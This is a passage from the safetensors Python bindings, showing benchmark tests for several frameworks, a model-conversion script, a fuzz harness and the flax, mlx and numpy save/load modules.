53 | result = benchmark(load_file, f.name)
54 | os.unlink(f.name)
55 |
56 | for k, v in weights.items():
57 | tv = result[k]
58 | assert mx.allclose(v, tv)
59 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import numpy as np
5 |
6 | import paddle
7 | from safetensors.paddle import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = paddle.zeros((50257, 768))
13 | tensors["wpe"] = paddle.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,))
22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,))
23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,))
28 | tensors["ln_f.weight"] = paddle.zeros((768,))
29 | tensors["ln_f.bias"] = paddle.zeros((768,))
30 | return tensors
31 |
32 |
33 | def test_paddle_paddle_load(benchmark):
34 | # benchmark something
35 | weights = create_gpt2(12)
36 | with tempfile.NamedTemporaryFile(delete=False) as f:
37 | paddle.save(weights, f.name)
38 | result = benchmark(paddle.load, f.name)
39 | os.unlink(f.name)
40 |
41 | for k, v in weights.items():
42 | tv = result[k]
43 | assert paddle.allclose(v, tv)
44 |
45 |
46 | def test_paddle_sf_load(benchmark):
47 | # benchmark something
48 | weights = create_gpt2(12)
49 | with tempfile.NamedTemporaryFile(delete=False) as f:
50 | save_file(weights, f.name)
51 | result = benchmark(load_file, f.name)
52 | os.unlink(f.name)
53 |
54 | for k, v in weights.items():
55 | tv = result[k]
56 | assert np.allclose(v, tv)
57 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_pt.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import pytest
5 | import torch
6 |
7 | from safetensors.torch import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = torch.zeros((50257, 768))
13 | tensors["wpe"] = torch.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768))
28 | tensors["ln_f.weight"] = torch.zeros((768))
29 | tensors["ln_f.bias"] = torch.zeros((768))
30 | return tensors
31 |
32 |
33 | def create_lora(n_layers: int):
34 | tensors = {}
35 | for i in range(n_layers):
36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32))
37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32))
38 | return tensors
39 |
40 |
41 | def test_pt_pt_load_cpu(benchmark):
42 | # benchmark something
43 | weights = create_gpt2(12)
44 | with tempfile.NamedTemporaryFile(delete=False) as f:
45 | torch.save(weights, f)
46 | result = benchmark(torch.load, f.name)
47 | os.unlink(f.name)
48 |
49 | for k, v in weights.items():
50 | tv = result[k]
51 | assert torch.allclose(v, tv)
52 |
53 |
54 | def test_pt_sf_load_cpu(benchmark):
55 | # benchmark something
56 | weights = create_gpt2(12)
57 | with tempfile.NamedTemporaryFile(delete=False) as f:
58 | save_file(weights, f.name)
59 | result = benchmark(load_file, f.name)
60 | os.unlink(f.name)
61 |
62 | for k, v in weights.items():
63 | tv = result[k]
64 | assert torch.allclose(v, tv)
65 |
66 |
67 | def test_pt_pt_load_cpu_small(benchmark):
68 | weights = create_lora(500)
69 | with tempfile.NamedTemporaryFile(delete=False) as f:
70 | torch.save(weights, f)
71 | result = benchmark(torch.load, f.name)
72 | os.unlink(f.name)
73 |
74 | for k, v in weights.items():
75 | tv = result[k]
76 | assert torch.allclose(v, tv)
77 |
78 |
79 | def test_pt_sf_load_cpu_small(benchmark):
80 | weights = create_lora(500)
81 | with tempfile.NamedTemporaryFile(delete=False) as f:
82 | save_file(weights, f.name)
83 | result = benchmark(load_file, f.name)
84 | os.unlink(f.name)
85 |
86 | for k, v in weights.items():
87 | tv = result[k]
88 | assert torch.allclose(v, tv)
89 |
90 |
91 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
92 | def test_pt_pt_load_gpu(benchmark):
93 | # benchmark something
94 | weights = create_gpt2(12)
95 | with tempfile.NamedTemporaryFile(delete=False) as f:
96 | torch.save(weights, f)
97 | result = benchmark(torch.load, f.name, map_location="cuda:0")
98 | os.unlink(f.name)
99 |
100 | for k, v in weights.items():
101 | v = v.cuda()
102 | tv = result[k]
103 | assert torch.allclose(v, tv)
104 |
105 |
106 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
107 | def test_pt_sf_load_gpu(benchmark):
108 | # benchmark something
109 | weights = create_gpt2(12)
110 | with tempfile.NamedTemporaryFile(delete=False) as f:
111 | save_file(weights, f.name)
112 | result = benchmark(load_file, f.name, device="cuda:0")
113 | os.unlink(f.name)
114 |
115 | for k, v in weights.items():
116 | v = v.cuda()
117 | tv = result[k]
118 | assert torch.allclose(v, tv)
119 |
120 |
121 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps")
122 | def test_pt_pt_load_mps(benchmark):
123 | # benchmark something
124 | weights = create_gpt2(12)
125 | with tempfile.NamedTemporaryFile(delete=False) as f:
126 | torch.save(weights, f)
127 | result = benchmark(torch.load, f.name, map_location="mps")
128 | os.unlink(f.name)
129 |
130 | for k, v in weights.items():
131 | v = v.to(device="mps")
132 | tv = result[k]
133 | assert torch.allclose(v, tv)
134 |
135 |
136 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps")
137 | def test_pt_sf_load_mps(benchmark):
138 | # benchmark something
139 | weights = create_gpt2(12)
140 | with tempfile.NamedTemporaryFile(delete=False) as f:
141 | save_file(weights, f.name)
142 | result = benchmark(load_file, f.name, device="mps")
143 | os.unlink(f.name)
144 |
145 | for k, v in weights.items():
146 | v = v.to(device="mps")
147 | tv = result[k]
148 | assert torch.allclose(v, tv)
149 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_tf.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import h5py
5 | import numpy as np
6 | import tensorflow as tf
7 |
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(filename, tensors=None, prefix=""):
12 | with h5py.File(filename, "r") as f:
13 | if tensors is None:
14 | tensors = {}
15 | for k in f.keys():
16 | if isinstance(f[k], h5py._hl.dataset.Dataset):
17 | key = k if not prefix else f"{prefix}_{k}"
18 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
19 | else:
20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
21 | return tensors
22 |
23 |
24 | def _save(filename, tensors, prefix=""):
25 | with h5py.File(filename, "w") as f:
26 | for name, tensor in tensors.items():
27 | tensor = tensor.numpy()
28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
29 | dset[:] = tensor
30 |
31 |
32 | def create_gpt2(n_layers: int):
33 | tensors = {}
34 | tensors["wte"] = tf.zeros((50257, 768))
35 | tensors["wpe"] = tf.zeros((1024, 768))
36 | for i in range(n_layers):
37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,))
38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,))
39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024))
40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304))
41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304))
42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768))
43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768))
44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768))
45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768))
46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072))
47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072))
48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768))
49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768))
50 | tensors["ln_f.weight"] = tf.zeros((768))
51 | tensors["ln_f.bias"] = tf.zeros((768))
52 | return tensors
53 |
54 |
55 | def test_tf_tf_load(benchmark):
56 | # benchmark something
57 | weights = create_gpt2(12)
58 | with tempfile.NamedTemporaryFile(delete=False) as f:
59 | _save(f.name, weights)
60 | result = benchmark(_load, f.name)
61 | os.unlink(f.name)
62 |
63 | for k, v in weights.items():
64 | tv = result[k]
65 | assert np.allclose(v, tv)
66 |
67 |
68 | def test_tf_sf_load(benchmark):
69 | # benchmark something
70 | weights = create_gpt2(12)
71 | with tempfile.NamedTemporaryFile(delete=False) as f:
72 | save_file(weights, f.name)
73 | result = benchmark(load_file, f.name)
74 | os.unlink(f.name)
75 |
76 | for k, v in weights.items():
77 | tv = result[k]
78 | assert np.allclose(v, tv)
79 |
--------------------------------------------------------------------------------
/bindings/python/convert_all.py:
--------------------------------------------------------------------------------
1 | """Simple utility tool to convert automatically most downloaded models"""
2 | from convert import AlreadyExists, convert
3 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
4 | from transformers import AutoConfig
5 |
6 |
7 | if __name__ == "__main__":
8 | api = HfApi()
9 | args = ModelSearchArguments()
10 |
11 | total = 50
12 | models = list(
13 | api.list_models(filter=ModelFilter(library=args.library.Transformers), sort="downloads", direction=-1)
14 | )[:total]
15 |
16 | correct = 0
17 | errors = set()
18 | for model in models:
19 | model = api.model_info(model.id, files_metadata=True)
20 | size = None
21 | for sibling in model.siblings:
22 | if sibling.rfilename == "pytorch_model.bin":
23 | size = sibling.size
24 | if size is None or size > 2_000_000_000:
25 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})")
26 | continue
27 |
28 | model_id = model.modelId
29 | print(f"[{model.downloads}] {model.modelId}")
30 | try:
31 | convert(api, model_id)
32 | correct += 1
33 | except AlreadyExists as e:
34 | correct += 1
35 | print(e)
36 | except Exception as e:
37 | config = AutoConfig.from_pretrained(model_id)
38 | errors.add(config.__class__.__name__)
39 | print(e)
40 |
41 | print(f"Errors: {errors}")
42 | print(f"File size is difference {len(errors)}")
43 | print(f"Correct rate {correct}/{total} ({correct/total * 100:.2f}%)")
44 |
--------------------------------------------------------------------------------
/bindings/python/fuzz.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import sys
3 | import tempfile
4 | from collections import defaultdict
5 |
6 | import atheris
7 |
8 |
9 | with atheris.instrument_imports():
10 | from safetensors.torch import load_file
11 |
12 |
13 | EXCEPTIONS = defaultdict(int)
14 | START = datetime.datetime.now()
15 | DT = datetime.timedelta(seconds=30)
16 |
17 |
18 | def TestOneInput(data):
19 | global START
20 | with tempfile.NamedTemporaryFile() as f:
21 | f.write(data)
22 | f.seek(0)
23 | try:
24 | load_file(f.name, device=0)
25 | except Exception as e:
26 | EXCEPTIONS[str(e)] += 1
27 |
28 | if datetime.datetime.now() - START > DT:
29 | for e, n in EXCEPTIONS.items():
30 | print(e, n)
31 | START = datetime.datetime.now()
32 |
33 |
34 | atheris.Setup(sys.argv, TestOneInput)
35 | atheris.Fuzz()
36 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.py:
--------------------------------------------------------------------------------
1 | # Re-export this
2 | from ._safetensors_rust import ( # noqa: F401
3 | SafetensorError,
4 | __version__,
5 | deserialize,
6 | safe_open,
7 | serialize,
8 | serialize_file,
9 | )
10 |
--------------------------------------------------------------------------------
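The re-exported raw API above works on plain dicts of bytes, with no framework involved. A minimal round-trip sketch (numpy is used here only to build the buffer; the dict layout follows the `serialize`/`deserialize` docstrings in the stub below):

```python
import numpy as np

from safetensors import deserialize, serialize

arr = np.arange(6, dtype=np.float32).reshape(2, 3)
payload = bytes(
    serialize({"embedding": {"dtype": "F32", "shape": [2, 3], "data": arr.tobytes()}})
)
for name, info in deserialize(payload):
    restored = np.frombuffer(info["data"], dtype=np.float32).reshape(info["shape"])
    assert name == "embedding" and np.array_equal(restored, arr)
```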
/bindings/python/py_src/safetensors/__init__.pyi:
--------------------------------------------------------------------------------
1 | # Generated content DO NOT EDIT
2 | @staticmethod
3 | def deserialize(bytes):
4 | """
5 |     Opens a safetensors file lazily and returns tensors as requested
6 |
7 | Args:
8 | data (`bytes`):
9 | The byte content of a file
10 |
11 | Returns:
12 |         (`List[Tuple[str, Dict[str, any]]]`):
13 | The deserialized content is like:
14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)]
15 | """
16 | pass
17 |
18 | @staticmethod
19 | def serialize(tensor_dict, metadata=None):
20 | """
21 | Serializes raw data.
22 |
23 | Args:
24 |         tensor_dict (`Dict[str, Dict[str, Any]]`):
25 | The tensor dict is like:
26 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}}
27 | metadata (`Dict[str, str]`, *optional*):
28 | The optional purely text annotations
29 |
30 | Returns:
31 | (`bytes`):
32 | The serialized content.
33 | """
34 | pass
35 |
36 | @staticmethod
37 | def serialize_file(tensor_dict, filename, metadata=None):
38 | """
39 | Serializes raw data into file.
40 |
41 | Args:
42 |         tensor_dict (`Dict[str, Dict[str, Any]]`):
43 | The tensor dict is like:
44 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}}
45 | filename (`str`, or `os.PathLike`):
46 | The name of the file to write into.
47 | metadata (`Dict[str, str]`, *optional*):
48 | The optional purely text annotations
49 |
50 | Returns:
51 | (`NoneType`):
52 | On success return None.
53 | """
54 | pass
55 |
56 | class safe_open:
57 | """
58 |     Opens a safetensors file lazily and returns tensors as requested
59 |
60 | Args:
61 | filename (`str`, or `os.PathLike`):
62 | The filename to open
63 |
64 | framework (`str`):
65 |             The framework you want your tensors in. Supported values:
66 |             `pt`, `tf`, `flax`, `mlx`, `numpy`.
67 |
68 | device (`str`, defaults to `"cpu"`):
69 | The device on which you want the tensors.
70 | """
71 |
72 | def __init__(self, filename, framework, device=...):
73 | pass
74 | def __enter__(self):
75 | """
76 | Start the context manager
77 | """
78 | pass
79 | def __exit__(self, _exc_type, _exc_value, _traceback):
80 | """
81 | Exits the context manager
82 | """
83 | pass
84 | def get_slice(self, name):
85 | """
86 | Returns a full slice view object
87 |
88 | Args:
89 | name (`str`):
90 | The name of the tensor you want
91 |
92 | Returns:
93 | (`PySafeSlice`):
94 | A dummy object you can slice into to get a real tensor
95 | Example:
96 | ```python
97 | from safetensors import safe_open
98 |
99 | with safe_open("model.safetensors", framework="pt", device=0) as f:
100 | tensor_part = f.get_slice("embedding")[:, ::8]
101 |
102 | ```
103 | """
104 | pass
105 | def get_tensor(self, name):
106 | """
107 | Returns a full tensor
108 |
109 | Args:
110 | name (`str`):
111 | The name of the tensor you want
112 |
113 | Returns:
114 | (`Tensor`):
115 | The tensor in the framework you opened the file for.
116 |
117 | Example:
118 | ```python
119 | from safetensors import safe_open
120 |
121 | with safe_open("model.safetensors", framework="pt", device=0) as f:
122 | tensor = f.get_tensor("embedding")
123 |
124 | ```
125 | """
126 | pass
127 | def keys(self):
128 | """
129 | Returns the names of the tensors in the file.
130 |
131 | Returns:
132 | (`List[str]`):
133 | The name of the tensors contained in that file
134 | """
135 | pass
136 | def metadata(self):
137 | """
138 |         Returns the special non-tensor information in the header
139 |
140 | Returns:
141 | (`Dict[str, str]`):
142 | The freeform metadata.
143 | """
144 | pass
145 |
146 | class SafetensorError(Exception):
147 | """
148 | Custom Python Exception for Safetensor errors.
149 | """
150 |
--------------------------------------------------------------------------------
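Tying the `safe_open` methods documented above together, a short sketch that inspects a file lazily: only the header is parsed up front, and a single tensor is materialized on demand:

```python
from safetensors import safe_open

with safe_open("model.safetensors", framework="np") as f:
    print(f.metadata())              # freeform header annotations, if any
    names = f.keys()                 # header only; no tensor data read yet
    tensor = f.get_tensor(names[0])  # materialize just this one tensor
    print(names[0], tensor.shape)
```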
/bindings/python/py_src/safetensors/flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import jax.numpy as jnp
7 | from jax import Array
8 | from safetensors import numpy, safe_open
9 |
10 |
11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes:
12 | """
13 | Saves a dictionary of tensors into raw bytes in safetensors format.
14 |
15 | Args:
16 | tensors (`Dict[str, Array]`):
17 | The incoming tensors. Tensors need to be contiguous and dense.
18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
19 | Optional text only metadata you might want to save in your header.
20 | For instance it can be useful to specify more about the underlying
21 | tensors. This is purely informative and does not affect tensor loading.
22 |
23 | Returns:
24 | `bytes`: The raw bytes representing the format
25 |
26 | Example:
27 |
28 | ```python
29 | from safetensors.flax import save
30 | from jax import numpy as jnp
31 |
32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
33 | byte_data = save(tensors)
34 | ```
35 | """
36 | np_tensors = _jnp2np(tensors)
37 | return numpy.save(np_tensors, metadata=metadata)
38 |
39 |
40 | def save_file(
41 | tensors: Dict[str, Array],
42 | filename: Union[str, os.PathLike],
43 | metadata: Optional[Dict[str, str]] = None,
44 | ) -> None:
45 | """
46 |     Saves a dictionary of tensors into a file in safetensors format.
47 |
48 | Args:
49 | tensors (`Dict[str, Array]`):
50 | The incoming tensors. Tensors need to be contiguous and dense.
51 |         filename (`str`, or `os.PathLike`):
52 | The filename we're saving into.
53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
54 | Optional text only metadata you might want to save in your header.
55 | For instance it can be useful to specify more about the underlying
56 | tensors. This is purely informative and does not affect tensor loading.
57 |
58 | Returns:
59 | `None`
60 |
61 | Example:
62 |
63 | ```python
64 | from safetensors.flax import save_file
65 | from jax import numpy as jnp
66 |
67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
68 | save_file(tensors, "model.safetensors")
69 | ```
70 | """
71 | np_tensors = _jnp2np(tensors)
72 | return numpy.save_file(np_tensors, filename, metadata=metadata)
73 |
74 |
75 | def load(data: bytes) -> Dict[str, Array]:
76 | """
77 | Loads a safetensors file into flax format from pure bytes.
78 |
79 | Args:
80 | data (`bytes`):
81 | The content of a safetensors file
82 |
83 | Returns:
84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu
85 |
86 | Example:
87 |
88 | ```python
89 | from safetensors.flax import load
90 |
91 | file_path = "./my_folder/bert.safetensors"
92 | with open(file_path, "rb") as f:
93 | data = f.read()
94 |
95 | loaded = load(data)
96 | ```
97 | """
98 | flat = numpy.load(data)
99 | return _np2jnp(flat)
100 |
101 |
102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]:
103 | """
104 | Loads a safetensors file into flax format.
105 |
106 | Args:
107 |         filename (`str`, or `os.PathLike`):
108 | The name of the file which contains the tensors
109 |
110 | Returns:
111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array`
112 |
113 | Example:
114 |
115 | ```python
116 | from safetensors.flax import load_file
117 |
118 | file_path = "./my_folder/bert.safetensors"
119 | loaded = load_file(file_path)
120 | ```
121 | """
122 | result = {}
123 | with safe_open(filename, framework="flax") as f:
124 | for k in f.offset_keys():
125 | result[k] = f.get_tensor(k)
126 | return result
127 |
128 |
129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]:
130 | for k, v in numpy_dict.items():
131 | numpy_dict[k] = jnp.array(v)
132 | return numpy_dict
133 |
134 |
135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.ndarray]:
136 | for k, v in jnp_dict.items():
137 | jnp_dict[k] = np.asarray(v)
138 | return jnp_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import mlx.core as mx
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None) -> bytes:
11 | """
12 | Saves a dictionary of tensors into raw bytes in safetensors format.
13 |
14 | Args:
15 | tensors (`Dict[str, mx.array]`):
16 | The incoming tensors. Tensors need to be contiguous and dense.
17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
18 | Optional text only metadata you might want to save in your header.
19 | For instance it can be useful to specify more about the underlying
20 | tensors. This is purely informative and does not affect tensor loading.
21 |
22 | Returns:
23 | `bytes`: The raw bytes representing the format
24 |
25 | Example:
26 |
27 | ```python
28 | from safetensors.mlx import save
29 | import mlx.core as mx
30 |
31 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
32 | byte_data = save(tensors)
33 | ```
34 | """
35 | np_tensors = _mx2np(tensors)
36 | return numpy.save(np_tensors, metadata=metadata)
37 |
38 |
39 | def save_file(
40 | tensors: Dict[str, mx.array],
41 | filename: Union[str, os.PathLike],
42 | metadata: Optional[Dict[str, str]] = None,
43 | ) -> None:
44 | """
45 |     Saves a dictionary of tensors into a file in safetensors format.
46 |
47 | Args:
48 | tensors (`Dict[str, mx.array]`):
49 | The incoming tensors. Tensors need to be contiguous and dense.
50 |         filename (`str`, or `os.PathLike`):
51 | The filename we're saving into.
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
53 | Optional text only metadata you might want to save in your header.
54 | For instance it can be useful to specify more about the underlying
55 | tensors. This is purely informative and does not affect tensor loading.
56 |
57 | Returns:
58 | `None`
59 |
60 | Example:
61 |
62 | ```python
63 | from safetensors.mlx import save_file
64 | import mlx.core as mx
65 |
66 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
67 | save_file(tensors, "model.safetensors")
68 | ```
69 | """
70 | np_tensors = _mx2np(tensors)
71 | return numpy.save_file(np_tensors, filename, metadata=metadata)
72 |
73 |
74 | def load(data: bytes) -> Dict[str, mx.array]:
75 | """
76 | Loads a safetensors file into MLX format from pure bytes.
77 |
78 | Args:
79 | data (`bytes`):
80 | The content of a safetensors file
81 |
82 | Returns:
83 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
84 |
85 | Example:
86 |
87 | ```python
88 | from safetensors.mlx import load
89 |
90 | file_path = "./my_folder/bert.safetensors"
91 | with open(file_path, "rb") as f:
92 | data = f.read()
93 |
94 | loaded = load(data)
95 | ```
96 | """
97 | flat = numpy.load(data)
98 | return _np2mx(flat)
99 |
100 |
101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
102 | """
103 | Loads a safetensors file into MLX format.
104 |
105 | Args:
106 |         filename (`str`, or `os.PathLike`):
107 | The name of the file which contains the tensors
108 |
109 | Returns:
110 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
111 |
112 | Example:
113 |
114 | ```python
115 |     from safetensors.mlx import load_file
116 |
117 | file_path = "./my_folder/bert.safetensors"
118 | loaded = load_file(file_path)
119 | ```
120 | """
121 | result = {}
122 | with safe_open(filename, framework="mlx") as f:
123 | for k in f.offset_keys():
124 | result[k] = f.get_tensor(k)
125 | return result
126 |
127 |
128 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
129 | for k, v in numpy_dict.items():
130 | numpy_dict[k] = mx.array(v)
131 | return numpy_dict
132 |
133 |
134 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.ndarray]:
135 | new_dict = {}
136 | for k, v in mx_dict.items():
137 | new_dict[k] = np.asarray(v)
138 | return new_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/numpy.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Dict, Optional, Union
4 |
5 | import numpy as np
6 |
7 | from safetensors import deserialize, safe_open, serialize, serialize_file
8 |
9 |
10 | def _tobytes(tensor: np.ndarray) -> bytes:
11 | if not _is_little_endian(tensor):
12 | tensor = tensor.byteswap(inplace=False)
13 | return tensor.tobytes()
14 |
15 |
16 | def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None) -> bytes:
17 | """
18 | Saves a dictionary of tensors into raw bytes in safetensors format.
19 |
20 | Args:
21 | tensor_dict (`Dict[str, np.ndarray]`):
22 | The incoming tensors. Tensors need to be contiguous and dense.
23 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
24 | Optional text only metadata you might want to save in your header.
25 | For instance it can be useful to specify more about the underlying
26 | tensors. This is purely informative and does not affect tensor loading.
27 |
28 | Returns:
29 | `bytes`: The raw bytes representing the format
30 |
31 | Example:
32 |
33 | ```python
34 | from safetensors.numpy import save
35 | import numpy as np
36 |
37 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
38 | byte_data = save(tensors)
39 | ```
40 | """
41 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()}
42 | serialized = serialize(flattened, metadata=metadata)
43 | result = bytes(serialized)
44 | return result
45 |
46 |
47 | def save_file(
48 | tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None
49 | ) -> None:
50 | """
51 |     Saves a dictionary of tensors into a file in safetensors format.
52 |
53 | Args:
54 | tensor_dict (`Dict[str, np.ndarray]`):
55 | The incoming tensors. Tensors need to be contiguous and dense.
56 |         filename (`str`, or `os.PathLike`):
57 | The filename we're saving into.
58 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
59 | Optional text only metadata you might want to save in your header.
60 | For instance it can be useful to specify more about the underlying
61 | tensors. This is purely informative and does not affect tensor loading.
62 |
63 | Returns:
64 | `None`
65 |
66 | Example:
67 |
68 | ```python
69 | from safetensors.numpy import save_file
70 | import numpy as np
71 |
72 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
73 | save_file(tensors, "model.safetensors")
74 | ```
75 | """
76 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()}
77 | serialize_file(flattened, filename, metadata=metadata)
78 |
79 |
80 | def load(data: bytes) -> Dict[str, np.ndarray]:
81 | """
82 | Loads a safetensors file into numpy format from pure bytes.
83 |
84 | Args:
85 | data (`bytes`):
86 | The content of a safetensors file
87 |
88 | Returns:
89 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu
90 |
91 | Example:
92 |
93 | ```python
94 | from safetensors.numpy import load
95 |
96 | file_path = "./my_folder/bert.safetensors"
97 | with open(file_path, "rb") as f:
98 | data = f.read()
99 |
100 | loaded = load(data)
101 | ```
102 | """
103 | flat = deserialize(data)
104 | return _view2np(flat)
105 |
106 |
107 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]:
108 | """
109 | Loads a safetensors file into numpy format.
110 |
111 | Args:
112 |         filename (`str`, or `os.PathLike`):
113 | The name of the file which contains the tensors
114 |
115 | Returns:
116 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray`
117 |
118 | Example:
119 |
120 | ```python
121 | from safetensors.numpy import load_file
122 |
123 | file_path = "./my_folder/bert.safetensors"
124 | loaded = load_file(file_path)
125 | ```
126 | """
127 | result = {}
128 | with safe_open(filename, framework="np") as f:
129 | for k in f.offset_keys():
130 | result[k] = f.get_tensor(k)
131 | return result
132 |
133 |
134 | _TYPES = {
135 | "F64": np.float64,
136 | "F32": np.float32,
137 | "F16": np.float16,
138 | "I64": np.int64,
139 | "U64": np.uint64,
140 | "I32": np.int32,
141 | "U32": np.uint32,
142 | "I16": np.int16,
143 | "U16": np.uint16,
144 | "I8": np.int8,
145 | "U8": np.uint8,
146 | "BOOL": bool,
147 | }
148 |
149 |
150 | def _getdtype(dtype_str: str) -> np.dtype:
151 | return _TYPES[dtype_str]
152 |
153 |
154 | def _view2np(safeview) -> Dict[str, np.ndarray]:
